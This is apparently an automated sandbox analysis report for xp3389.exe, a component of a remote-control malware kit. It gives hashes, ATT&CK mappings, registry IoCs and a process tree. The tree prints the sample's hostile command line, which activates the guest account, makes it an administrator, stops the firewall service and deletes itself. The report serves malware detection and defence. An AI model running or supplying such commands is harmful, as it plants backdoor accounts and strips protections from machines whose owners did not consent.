9229bf3c95eefabaf00e4221c0ff71ad3cb8c842a813d8a5816af2b0b15bba06

Analysis

max time kernel
189s
max time network
193s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2022 21:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

夢魔个人远控GHOST+.3.78美化版/Tool/xp3389.exe
Size

94KB
MD5

fda31787845353b9a8518f66288d2779
SHA1

9e3a0f09a92301fa8dc2e394958df2ad5d879372
SHA256

828f5c2e6e571f77872219b93d91ad35b237cb5ba11c459f217d304f9c270096
SHA512

36e8578973993d259a6b5db87e73d62e4fe27994f2339ef4b2f915ffd087664a90627e0eb751f6bdccb7c3aa96f968e59dd9c06298e584b9203b548c8f917611
SSDEEP

1536:Dszc35cz+VhixNufsomxrsbGAFKh87pZl6nC24Zj4BD1vnE9ZmPmMfKRdpV:Cc35cz+Vhiuf6wrWyZwnC2mKE9sP2N

Score

9^/10

persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

xp3389.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\system32\\termsrvhack.dll"	xp3389.exe

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

xp3389.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\KeepRASConnections = "1"	xp3389.exe

Runs net.exe

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

xp3389.execmd.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 2144 wrote to memory of 4448	2144	xp3389.exe	cmd.exe
PID 2144 wrote to memory of 4448	2144	xp3389.exe	cmd.exe
PID 2144 wrote to memory of 4448	2144	xp3389.exe	cmd.exe
PID 4448 wrote to memory of 3668	4448	cmd.exe	net.exe
PID 4448 wrote to memory of 3668	4448	cmd.exe	net.exe
PID 4448 wrote to memory of 3668	4448	cmd.exe	net.exe
PID 3668 wrote to memory of 3672	3668	net.exe	net1.exe
PID 3668 wrote to memory of 3672	3668	net.exe	net1.exe
PID 3668 wrote to memory of 3672	3668	net.exe	net1.exe
PID 4448 wrote to memory of 3424	4448	cmd.exe	net.exe
PID 4448 wrote to memory of 3424	4448	cmd.exe	net.exe
PID 4448 wrote to memory of 3424	4448	cmd.exe	net.exe
PID 3424 wrote to memory of 4200	3424	net.exe	net1.exe
PID 3424 wrote to memory of 4200	3424	net.exe	net1.exe
PID 3424 wrote to memory of 4200	3424	net.exe	net1.exe
PID 4448 wrote to memory of 1128	4448	cmd.exe	net.exe
PID 4448 wrote to memory of 1128	4448	cmd.exe	net.exe
PID 4448 wrote to memory of 1128	4448	cmd.exe	net.exe
PID 1128 wrote to memory of 2516	1128	net.exe	net1.exe
PID 1128 wrote to memory of 2516	1128	net.exe	net1.exe
PID 1128 wrote to memory of 2516	1128	net.exe	net1.exe
PID 4448 wrote to memory of 3232	4448	cmd.exe	net.exe
PID 4448 wrote to memory of 3232	4448	cmd.exe	net.exe
PID 4448 wrote to memory of 3232	4448	cmd.exe	net.exe
PID 3232 wrote to memory of 4176	3232	net.exe	net1.exe
PID 3232 wrote to memory of 4176	3232	net.exe	net1.exe
PID 3232 wrote to memory of 4176	3232	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\夢魔个人远控GHOST+.3.78美化版\Tool\xp3389.exe
"C:\Users\Admin\AppData\Local\Temp\夢魔个人远控GHOST+.3.78美化版\Tool\xp3389.exe"
1⤵
- Sets DLL path for service in the registry
- Modifies WinLogon
- Suspicious use of WriteProcessMemory
PID:2144

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net user guest /active:yes && net user guest guest && net localgroup administrators guest /add && net stop SharedAccess /y && del "C:\Users\Admin\AppData\Local\Temp\??????GHOST+.3.78???\Tool\xp3389.exe" && sc delete SharedAccess
2⤵
- Suspicious use of WriteProcessMemory
PID:4448

C:\Windows\SysWOW64\net.exe
net user guest /active:yes
3⤵
- Suspicious use of WriteProcessMemory
PID:3668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user guest /active:yes
4⤵
PID:3672

C:\Windows\SysWOW64\net.exe
net user guest guest
3⤵
- Suspicious use of WriteProcessMemory
PID:3424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user guest guest
4⤵
PID:4200

C:\Windows\SysWOW64\net.exe
net localgroup administrators guest /add
3⤵
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administrators guest /add
4⤵
PID:2516

C:\Windows\SysWOW64\net.exe
net stop SharedAccess /y
3⤵
- Suspicious use of WriteProcessMemory
PID:3232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SharedAccess /y
4⤵
PID:4176

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1128-137-0x0000000000000000-mapping.dmp

Download
memory/2516-138-0x0000000000000000-mapping.dmp

Download
memory/3232-139-0x0000000000000000-mapping.dmp

Download
memory/3424-135-0x0000000000000000-mapping.dmp

Download
memory/3668-133-0x0000000000000000-mapping.dmp

Download
memory/3672-134-0x0000000000000000-mapping.dmp

Download
memory/4176-140-0x0000000000000000-mapping.dmp

Download
memory/4200-136-0x0000000000000000-mapping.dmp

Download
memory/4448-132-0x0000000000000000-mapping.dmp

Download